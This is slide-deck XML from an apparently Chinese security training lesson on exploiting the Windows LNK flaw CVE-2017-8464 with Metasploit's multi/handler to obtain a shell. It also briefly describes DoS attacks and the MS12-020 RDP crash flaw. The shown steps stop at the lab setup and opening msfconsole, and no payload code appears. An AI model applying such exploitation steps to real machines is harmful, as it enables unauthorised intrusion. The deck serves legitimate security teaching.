              <p:spPr>
                <a:xfrm>
                  <a:off x="3630725" y="2480384"/>
                  <a:ext cx="720080" cy="720080"/>
                </a:xfrm>
                <a:prstGeom prst="rect">
                  <a:avLst/>
                </a:prstGeom>
                <a:solidFill>
                  <a:schemeClr val="accent1"/>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42" name="Oval 43"/>
              <p:cNvSpPr>
                <a:spLocks noChangeAspect="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="1540736" y="4239008"/>
                <a:ext cx="585892" cy="585892"/>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nvGrpSpPr>
              <p:cNvPr id="43" name="Group 44"/>
              <p:cNvGrpSpPr/>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr>
              <a:xfrm>
                <a:off x="1672516" y="4367800"/>
                <a:ext cx="328869" cy="328308"/>
                <a:chOff x="2581275" y="2582069"/>
                <a:chExt cx="465138" cy="464344"/>
              </a:xfrm>
              <a:solidFill>
                <a:schemeClr val="accent1"/>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8" name="Group 26"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="13493" y="2910"/>
              <a:ext cx="2054" cy="3672"/>
              <a:chOff x="5960997" y="2484779"/>
              <a:chExt cx="1304471" cy="2341845"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:grpSp>
            <p:nvGrpSpPr>
              <p:cNvPr id="59" name="Group 27"/>
              <p:cNvGrpSpPr/>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr>
              <a:xfrm>
                <a:off x="5960997" y="2484779"/>
                <a:ext cx="1304471" cy="2341845"/>
                <a:chOff x="5960997" y="2484779"/>
                <a:chExt cx="1304471" cy="2341845"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:grpSp>
              <p:nvGrpSpPr>
                <p:cNvPr id="60" name="Group 29"/>
                <p:cNvGrpSpPr>
                  <a:grpSpLocks noChangeAspect="1"/>
                </p:cNvGrpSpPr>
                <p:nvPr/>
              </p:nvGrpSpPr>
              <p:grpSpPr bwMode="auto">
                <a:xfrm>
                  <a:off x="5960997" y="2484779"/>
                  <a:ext cx="1304471" cy="1802479"/>
                  <a:chOff x="3149600" y="2480384"/>
                  <a:chExt cx="1201204" cy="1660005"/>
                </a:xfrm>
              </p:grpSpPr>
              <p:sp>
                <p:nvSpPr>
                  <p:cNvPr id="61" name="等腰三角形 51"/>
                  <p:cNvSpPr/>
                  <p:nvPr>
                    <p:custDataLst>
                      <p:tags r:id="rId1"/>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62" name="矩形 52"/>
                  <p:cNvSpPr/>
                  <p:nvPr>
                    <p:custDataLst>
                      <p:tags r:id="rId2"/>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81" name="Oval 30"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeAspect="1"/>
                </p:cNvSpPr>
                <p:nvPr>
                  <p:custDataLst>
                    <p:tags r:id="rId3"/>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82" name="AutoShape 112"/>
              <p:cNvSpPr/>
              <p:nvPr>
                <p:custDataLst>
                  <p:tags r:id="rId4"/>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9" name="组合 48"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="672" y="3092"/>
              <a:ext cx="14823" cy="4347"/>
              <a:chOff x="672" y="3092"/>
              <a:chExt cx="14823" cy="4347"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:grpSp>
            <p:nvGrpSpPr>
              <p:cNvPr id="19" name="Group 20"/>
              <p:cNvGrpSpPr/>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr>
              <a:xfrm>
                <a:off x="10984" y="3092"/>
                <a:ext cx="2054" cy="3685"/>
                <a:chOff x="9539460" y="2484779"/>
                <a:chExt cx="1304471" cy="2340121"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:grpSp>
              <p:nvGrpSpPr>
                <p:cNvPr id="20" name="Group 21"/>
                <p:cNvGrpSpPr>
                  <a:grpSpLocks noChangeAspect="1"/>
                </p:cNvGrpSpPr>
                <p:nvPr/>
              </p:nvGrpSpPr>
              <p:grpSpPr bwMode="auto">
                <a:xfrm>
                  <a:off x="9539460" y="2484779"/>
                  <a:ext cx="1304471" cy="1802479"/>
                  <a:chOff x="3149600" y="2480384"/>
                  <a:chExt cx="1201204" cy="1660005"/>
                </a:xfrm>
              </p:grpSpPr>
              <p:sp>
                <p:nvSpPr>
                  <p:cNvPr id="23" name="等腰三角形 51"/>
                  <p:cNvSpPr/>
                  <p:nvPr/>
                </p:nvSpPr>
                <p:spPr>
                  <a:xfrm flipV="1">
                    <a:off x="3149600" y="3200883"/>
                    <a:ext cx="1201204" cy="939506"/>
                  </a:xfrm>
                  <a:prstGeom prst="triangle">
                    <a:avLst/>
                  </a:prstGeom>
                  <a:gradFill>
                    <a:gsLst>
                      <a:gs pos="0">
                        <a:schemeClr val="accent5"/>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24" name="矩形 52"/>
                  <p:cNvSpPr/>
                  <p:nvPr/>
                </p:nvSpPr>
                <p:spPr>
                  <a:xfrm>
                    <a:off x="3630724" y="2480384"/>
                    <a:ext cx="720080" cy="720080"/>
                  </a:xfrm>
                  <a:prstGeom prst="rect">
                    <a:avLst/>
                  </a:prstGeom>
                  <a:solidFill>
                    <a:schemeClr val="accent5"/>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21" name="Oval 22"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeAspect="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr>
                <a:xfrm>
                  <a:off x="9904781" y="4239008"/>
                  <a:ext cx="585892" cy="585892"/>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AutoShape 59"/>
                <p:cNvSpPr/>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="10027260" y="4362838"/>
                  <a:ext cx="328869" cy="3283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4" name="Text Placeholder 3"/>
              <p:cNvSpPr txBox="1"/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="672"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dirty="0"/>
                  <a:t>学习目标</a:t>
                </a:r>
                <a:endParaRPr lang="zh-CN" dirty="0"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="67" name="Text Placeholder 3"/>
              <p:cNvSpPr txBox="1"/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="3020"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项目分析</a:t>
                </a:r>
                <a:endParaRPr lang="en-US" dirty="0"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="70" name="Text Placeholder 3"/>
              <p:cNvSpPr txBox="1"/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="5759"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相关知识</a:t>
                </a:r>
                <a:endParaRPr lang="en-US" dirty="0"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="73" name="Text Placeholder 3"/>
              <p:cNvSpPr txBox="1"/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="8551" y="6955"/>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项目实例</a:t>
                </a:r>
                <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="76" name="Text Placeholder 3"/>
              <p:cNvSpPr txBox="1"/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="11344" y="6929"/>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项目实施</a:t>
                </a:r>
                <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="84" name="Text Placeholder 3"/>
              <p:cNvSpPr txBox="1"/>
              <p:nvPr>
                <p:custDataLst>
                  <p:tags r:id="rId5"/>
                </p:custDataLst>
              </p:nvPr>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="13895" y="688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项目训练</a:t>
                </a:r>
                <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
              </a:p>
            </p:txBody>
          </p:sp>
        </p:grpSp>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="86" name="Group 26"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="16233" y="2830"/>
              <a:ext cx="2054" cy="3672"/>
              <a:chOff x="5960997" y="2484779"/>
              <a:chExt cx="1304471" cy="2341845"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:grpSp>
            <p:nvGrpSpPr>
              <p:cNvPr id="87" name="Group 27"/>
              <p:cNvGrpSpPr/>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr>
              <a:xfrm>
                <a:off x="5960997" y="2484779"/>
                <a:ext cx="1304471" cy="2341845"/>
                <a:chOff x="5960997" y="2484779"/>
                <a:chExt cx="1304471" cy="2341845"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:grpSp>
              <p:nvGrpSpPr>
                <p:cNvPr id="88" name="Group 29"/>
                <p:cNvGrpSpPr>
                  <a:grpSpLocks noChangeAspect="1"/>
                </p:cNvGrpSpPr>
                <p:nvPr/>
              </p:nvGrpSpPr>
              <p:grpSpPr bwMode="auto">
                <a:xfrm>
                  <a:off x="5960997" y="2484779"/>
                  <a:ext cx="1304471" cy="1802479"/>
                  <a:chOff x="3149600" y="2480384"/>
                  <a:chExt cx="1201204" cy="1660005"/>
                </a:xfrm>
              </p:grpSpPr>
              <p:sp>
                <p:nvSpPr>
                  <p:cNvPr id="89" name="等腰三角形 51"/>
                  <p:cNvSpPr/>
                  <p:nvPr>
                    <p:custDataLst>
                      <p:tags r:id="rId6"/>
                    </p:custDataLst>
                  </p:nvPr>
                </p:nvSpPr>
                <p:spPr>
                  <a:xfrm flipV="1">
                    <a:off x="3149600" y="3200883"/>
                    <a:ext cx="1201204" cy="939506"/>
                  </a:xfrm>
                  <a:prstGeom prst="triangle">
                    <a:avLst/>
                  </a:prstGeom>
                  <a:gradFill>
                    <a:gsLst>
                      <a:gs pos="0">
                        <a:schemeClr val="accent3"/>
                      </a:gs>
                      <a:gs pos="100000">
                        <a:srgbClr val="EEECE1">
                          <a:lumMod val="90000"/>
                          <a:alpha val="0"/>
                        </a:srgbClr>
                      </a:gs>
                    </a:gsLst>
                    <a:lin ang="5400000" scaled="0"/>
                  </a:gra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sp>
                <p:nvSpPr>
                  <p:cNvPr id="90" name="矩形 52"/>
                  <p:cNvSpPr/>
                  <p:nvPr>
                    <p:custDataLst>
                      <p:tags r:id="rId7"/>
                    </p:custDataLst>
                  </p:nvPr>
                </p:nvSpPr>
                <p:spPr>
                  <a:xfrm>
                    <a:off x="3630724" y="2480384"/>
                    <a:ext cx="720080" cy="720080"/>
                  </a:xfrm>
                  <a:prstGeom prst="rect">
                    <a:avLst/>
                  </a:prstGeom>
                  <a:solidFill>
                    <a:schemeClr val="accent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algn="ctr" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
                      <a:spcBef>
                        <a:spcPts val="0"/>
                      </a:spcBef>
                      <a:spcAft>
                        <a:spcPts val="0"/>
                      </a:spcAft>
                      <a:defRPr/>
                    </a:pPr>
                    <a:endParaRPr lang="zh-CN" altLang="en-US" kern="0" dirty="0">
                      <a:solidFill>
                        <a:sysClr val="window" lastClr="FFFFFF"/>
                      </a:solidFill>
                      <a:latin typeface="Calibri" panose="020F0502020204030204"/>
                      <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                    </a:endParaRPr>
                  </a:p>
                </p:txBody>
              </p:sp>
            </p:grpSp>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="91" name="Oval 30"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeAspect="1"/>
                </p:cNvSpPr>
                <p:nvPr>
                  <p:custDataLst>
                    <p:tags r:id="rId8"/>
                  </p:custDataLst>
                </p:nvPr>
              </p:nvSpPr>
              <p:spPr>
                <a:xfrm>
                  <a:off x="6312532" y="4240732"/>
                  <a:ext cx="585892" cy="585892"/>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92" name="AutoShape 112"/>
              <p:cNvSpPr/>
              <p:nvPr>
                <p:custDataLst>
                  <p:tags r:id="rId9"/>
                </p:custDataLst>
              </p:nvPr>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="6453017" y="4367800"/>
                <a:ext cx="328308" cy="32886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4" name="Text Placeholder 3"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId10"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="16635" y="6800"/>
              <a:ext cx="1600" cy="484"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" lIns="0" tIns="0" rIns="0" bIns="0" anchor="ctr" anchorCtr="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle>
              <a:defPPr>
                <a:defRPr lang="zh-CN"/>
              </a:defPPr>
              <a:lvl1pPr marL="0" indent="0" algn="ctr" defTabSz="1216025">
                <a:spcBef>
                  <a:spcPct val="20000"/>
                </a:spcBef>
                <a:buNone/>
                <a:defRPr sz="2000" b="1" baseline="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1">
                      <a:lumMod val="65000"/>
                      <a:lumOff val="35000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                </a:defRPr>
              </a:lvl1pPr>
              <a:lvl2pPr marL="457200" indent="0">
                <a:buNone/>
                <a:defRPr sz="1200"/>
              </a:lvl2pPr>
              <a:lvl3pPr marL="914400" indent="0">
                <a:buNone/>
                <a:defRPr sz="1000"/>
              </a:lvl3pPr>
              <a:lvl4pPr marL="1371600" indent="0">
                <a:buNone/>
                <a:defRPr sz="900"/>
              </a:lvl4pPr>
              <a:lvl5pPr marL="1828800"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t>项目评价</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="48" name="文本框 47"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4505325" y="1420495"/>
            <a:ext cx="2266950" cy="64516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kumimoji="1" lang="zh-CN" altLang="en-US" sz="3600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>学习路径</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="36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rand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dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>【学习目标】</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="内容占位符 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="1825625"/>
            <a:ext cx="10515600" cy="2205990"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>1、了解LINK文件远程代码执行漏洞。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>2、利用CVE-2017-8464漏洞实现LINK文件远程代码执行</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="文本占位符 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId1"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="431800" y="56515"/>
            <a:ext cx="1146492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911225" y="1676400"/>
            <a:ext cx="10459085" cy="4892675"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="304800"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>     </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" sz="2400" b="1">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>拒绝服务（DoS）</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" sz="2400" b="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>即是攻击者使目标服务器停止提供服务，是黑客常用的攻击手段之一，任何对服务的干涉，只要能够对目标造成麻烦，使某些服务被暂停或失去可用性甚至主机死机的均称为拒绝服务。拒绝服务攻击问题一直得不到合理的解决，究其原因是因为网络协议本身的安全缺陷，从而拒绝服务攻击便成为了攻击者最常见的攻击，一般有计算机网络带宽攻击和连通性攻击。带宽攻击指以极大的通信量冲击网络，使所有可用网络资源都被消耗殆尽，最后导致合法的用户请求无法通过，连通性攻击是指用大量的连接请求冲击计算机，使所有可用的操作系统资源都被消耗殆尽，最终计算机无法再处理合法用户的请求 。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" sz="2400" b="0">
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="304800"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>       </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" sz="2400" b="1">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>远程桌面协议(RDP)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" sz="2400" b="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>用于服务器和客户端之间进行通信的协议。通过使用3389端口上的“终端服务远程桌面协议 (RDP)”和“管理远程桌面”的功能可远程访问服务器桌面。MS12_020漏洞原理是攻击者向目标主机发送特定的RDP包消耗系统资源，造成操作系统蓝屏崩溃。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="24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【项目分析】</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="内容占位符 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="1825625"/>
            <a:ext cx="10515600" cy="3303905"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>   </a:t>
            </a:r>
            <a:r>
              <a:t>CVE-2017-8464漏洞是存在于Windows 的一个远程代码执行漏洞，该漏洞原理在经特殊设计快捷方式图标显示时允许发生远程代码执行。Windows系统使用二进制解析 .LNK文件，当恶意二进制代码被系统识别执行时即可实现远程代码执行，成功利用此漏洞的攻击者会获得与本地用户相同的用户权限。本项目运用Metasploit对目标主机所存在的漏洞进行利用，选用multi/handler监听模块，利用后可获取shell。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="80" name="文本占位符 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId1"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="252730" y="56515"/>
            <a:ext cx="1173226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【相关知识】</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="4400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="100" name="文本框 99"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="911225" y="1676400"/>
            <a:ext cx="10459085" cy="3046095"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="304800"/>
            <a:r>
              <a:rPr sz="2400">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>北京时间2017年6月13日凌晨，微软官方发布6月安全补丁程序，“震网三代” LNK文件远程代码执行漏洞（CVE-2017-8464）就在其中，该漏洞是一个微软Windows系统处理LNK文件过程中发生的远程代码执行漏洞，当存在漏洞的系统被插上有 .LNK文件病毒木马的U盘或运行了感染有病毒木马的文件时，不需要任何额外操作，漏洞攻击程序便可以借此完全控制用户的电脑系统。该漏洞也可能由用户访问网络共享、从互联网下载、拷贝文件等操作从而触发和利用攻击。也就是说，漏洞可以在系统开启U盘自动播放功能，通过网络共享访问文件或直接访问等情况下触发。</a:t>
            </a:r>
            <a:endParaRPr sz="24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1699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sz="2400" b="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" b="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>小王在对办公室的电脑进行安全检查时，发现有一台Window 7系统的办公电脑可能存在CVE-2017-8464漏洞，这个漏洞可能会被攻击者利用，于是他决定对系统进行安全测试并加固。</a:t>
            </a:r>
            <a:endParaRPr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【项目实施】</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="4400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="21" name="文本框 20"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="859155" y="1776095"/>
            <a:ext cx="7762875" cy="691515"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0"/>
            <a:r>
              <a:rPr lang="zh-CN" sz="2100" b="1">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>步骤一</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2100" b="1">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" sz="2100" b="1">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>准备测试环境</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" b="0">
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0"/>
            <a:r>
              <a:rPr lang="zh-CN" b="1">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>本任务所使用的计算机见下表</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" b="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>：</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" b="0">
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="22" name="表格 21"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId3"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="948690" y="2665730"/>
          <a:ext cx="6127115" cy="1420495"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr/>
              <a:tblGrid>
                <a:gridCol w="826135"/>
                <a:gridCol w="1927225"/>
                <a:gridCol w="2315210"/>
                <a:gridCol w="1058545"/>
              </a:tblGrid>
              <a:tr h="4432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编号</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操作系统</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IP地址</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用途</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135">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kali 2020</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192.168.66.5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攻击机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2</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Win2003R2-1</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192.138.66.35</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宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                          <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                          <a:cs typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                        </a:rPr>
                        <a:t>靶机</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42900"/>
            <a:ext cx="10515600" cy="5961380"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>步骤二 cve-2017-8464漏洞利用设置 </a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>1.在Kali Linux终端界面中输入“msfconsole”命令，打开Metasploit框架，如图3-2-10所示</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2" name="图片 -2147482624" descr="图3-2-10打开Metasploit框架"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId1"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1172210" y="1747520"/>
            <a:ext cx="7943850" cy="4295775"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="100" name="文本框 99"/>
          <p:cNvSpPr txBox="1"/>
